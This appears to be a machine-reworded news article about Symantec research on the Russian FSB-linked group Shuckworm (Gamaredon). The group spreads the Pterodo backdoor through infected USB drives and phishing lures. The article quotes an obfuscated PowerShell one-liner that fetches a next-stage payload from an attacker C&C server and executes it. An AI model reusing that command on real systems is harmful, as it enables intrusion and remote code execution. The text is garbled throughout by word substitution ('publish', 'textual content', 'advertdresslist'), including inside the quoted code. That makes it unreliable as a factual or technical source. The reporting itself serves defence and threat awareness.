Hackers working for Russia’s Federal Safety Service have mounted a number of cyberattacks that used USB-based malware to steal massive quantities of information from Ukrainian targets to be used in its ongoing invasion of its smaller neighbor, researchers mentioned.

“The sectors and nature of the organizations and machines focused might have given the attackers entry to vital quantities of delicate info,” researchers from Symantec, now owned by Broadcom, wrote in a Thursday publish. “There have been indications in some organizations that the attackers have been on the machines of the organizations’ human sources departments, indicating that details about people working on the varied organizations was a precedence for the attackers, amongst different issues.”

The group, which Symantec tracks as Shuckworm and different researchers name Gamaredon and Armageddon, has been lively since 2014 and has been linked to Russia’s FSB, the principal safety service in that nation. The group focuses solely on acquiring intelligence on Ukrainian targets. In 2020, researchers at safety agency SentinelOne mentioned the hacking group had “attacked over 5,000 particular person entities throughout the Ukraine, with specific focus on areas the place Ukrainian troops are deployed.”

In February, Shuckworm started deploying new malware and command-and-control infrastructure that has efficiently penetrated the defenses of a number of Ukrainian organizations within the military, safety companies, and authorities of that nation. Group members appear most fascinated with acquiring info associated to delicate military info that could possibly be abused in Russia’s ongoing invasion.

This newer marketing campaign debuted new malware within the type of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script prompts when contaminated USB drives are related to focused computer systems. The malicious script first copies itself onto the focused machine to create a shortcut file with the extension rtf.lnk. The information have names akin to video_porn.rtf.lnk, do_not_delete.rtf.lnk, and proof.rtf.lnk. The names, that are largely within the Ukrainian language, are an try to entice targets to open the information so they are going to set up Pterodo on machines.

The script goes on to enumerate all drives related to the focused laptop and to repeat itself to all hooked up detachable drives, almost definitely in hopes of infecting any air-gapped gadgets, that are deliberately not related to the Web in an try to forestall them from being hacked.

To cowl its tracks, Shuckworm has created dozens of variants and quickly rotated the IP addresses and infrastructure it makes use of for command and management. The group additionally makes use of official companies akin to Telegram and its micro-blogging platform Telegraph for command and management in one other try to keep away from detection.

Shuckworm usually makes use of phishing emails as an preliminary vector into targets’ computer systems. The emails comprise malicious attachments that masquerade as information with extensions, together with .docx, .rar, .sfx, lnk, and hta. Emails usually use matters akin to armed conflicts, legal proceedings, combating crime, and defending youngsters as lures to get targets to open the emails and click on on the attachments.

Symantec researchers mentioned that an contaminated laptop they recovered within the marketing campaign was typical for the best way it really works. They wrote:

In a single sufferer, the primary signal of malicious exercise was when the consumer appeared to open a RAR archive file that was possible delivered by way of a spear-phishing electronic mail and which contained a malicious Doc.

After the doc was opened, a malicious PowerShell command was noticed being executed to obtain the next-stage payload from the attackers’ C&C server:

“CSIDL_SYSTEMcmd.exe” /c begin /min “” powershell -w hidden
“$gt=’/get.’+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.advert
dresslist[0];$shopper=(new-object
internet.webclient);$faddr=’htt’+’ps://’+$addr+$gt;$textual content=$shopper.downloads
tring($faddr);iex $textual content”

Extra lately, Symantec has noticed Shuckworm leveraging extra IP addresses of their PowerShell scripts. That is possible an try to evade some monitoring strategies employed by researchers.

Shuckworm additionally continues to replace the obfuscation methods utilized in its PowerShell scripts in an try to keep away from detection, with as much as 25 new variants of the group’s scripts noticed monthly between January and April 2023.

Thursday’s publish contains IP addresses, hashes, file names, and different indicators of compromise folks can use to detect if they’ve been focused. The publish additionally warns that the group poses a menace that targets ought to take critically.

“This exercise demonstrates that Shuckworm’s relentless focus on Ukraine continues,” they wrote. “It appears clear that Russian nation-state-backed assault teams proceed to laser in on Ukrainian targets in makes an attempt to seek out knowledge which will doubtlessly assist their military operations.”